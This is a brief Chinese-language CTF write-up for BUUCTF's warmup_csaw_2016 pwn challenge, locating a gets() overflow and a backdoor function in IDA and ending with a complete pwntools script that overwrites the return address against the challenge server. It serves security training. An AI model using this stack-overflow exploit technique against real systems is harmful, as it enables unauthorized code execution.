buuctf pwn03 warmup_csaw_2016 1
1.checksec一下
2.ida
发现漏洞函数gets()
shift+f12找到可疑文件catflag.text点进去
点command再enter
按f5或tab反汇编发现后门函数
从上面汇编代码中可以看出后门函数的地址为0x40060d
从汇编代码中可看到v5到rbp的距离为0x40h因为是64位程序还得加8才到返回地址。
因此我们的exp如下:
from pwn import*
p=remote('node4.buuoj.cn',25459)
payload=b'a'*(0x40+8)+p64(0x40060D)
p.sendline(payload)
p.interactive()
运行脚本得到flag